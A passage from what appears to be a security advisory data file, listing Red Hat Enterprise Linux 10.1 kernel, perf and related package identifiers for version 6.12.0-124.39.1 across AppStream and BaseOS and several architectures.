"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
